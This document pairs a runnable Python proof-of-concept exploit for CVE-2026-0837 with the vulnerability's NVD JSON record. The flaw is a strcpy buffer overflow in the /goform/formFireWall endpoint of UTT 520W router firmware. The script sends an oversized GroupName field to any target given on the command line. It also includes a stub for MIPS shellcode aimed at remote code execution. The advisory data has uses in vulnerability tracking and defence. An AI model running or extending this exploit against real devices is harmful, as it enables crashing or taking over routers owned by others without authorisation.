CVE-2026-0837

#!/usr/bin/env python3 """ CVE-2026-0837 PoC - UTT Router Buffer Overflow in /goform/formFireWall Affected: UTT 进取 520W firmware 1.7.7-180627 CVSS Score: 8.8 (High) """ import requests import sys target = "http://target:80" # Generate payload with oversized GroupName parameter # The strcpy function will overflow the buffer payload_size = 500 payload = "A" * payload_size def exploit(): """Exploit the buffer overflow vulnerability in formFireWall""" url = f"{target}/goform/formFireWall" # Prepare the malicious request with oversized GroupName data = { "GroupName": payload, "fireWall": "1" } try: print(f"[*] Sending exploit payload to {url}") print(f"[*] Payload size: {payload_size} bytes") response = requests.post(url, data=data, timeout=10) print(f"[+] Request sent successfully") print(f"[*] Status code: {response.status_code}") return True except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False def generate_shellcode(): """Generate shellcode for remote code execution (placeholder)""" # MIPS shellcode for router architecture shellcode = b"\x00\x00\x00\x00" # NOP sled return shellcode if __name__ == "__main__": if len(sys.argv) > 1: target = sys.argv[1] exploit()

{"cve": {"id": "CVE-2026-0837", "sourceIdentifier": "[email protected]", "published": "2026-01-11T05:15:58.893", "lastModified": "2026-01-13T22:03:26.023", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in UTT 进取 520W 1.7.7-180627. This affects the function strcpy of the file /goform/formFireWall. Such manipulation of the argument GroupName leads to buffer overflow. The attack can be executed remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se identificó una vulnerabilidad en UTT ?? 520W 1.7.7-180627. Esto afecta la función strcpy del archivo /goform/formFireWall. Dicha manipulación del argumento GroupName conduce a un desbordamiento de búfer. El ataque puede ser ejecutado de forma remota. El exploit está disponible públicamente y podría ser utilizado. Se contactó al proveedor con antelación sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:utt:520w_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.7.7-180627", "matchCriteriaId": "1ED9CE5B-AC0E-4C53-A084-7777D5050400"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:utt:520w:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "DD42AC5F-531F-40FC-BD78-D20F298AF79A"}]}]}], "references": [{"url": "https://github.com/Lena-lyy/cve/blob/main/1223/27.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.340437", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.340437", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.729019", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}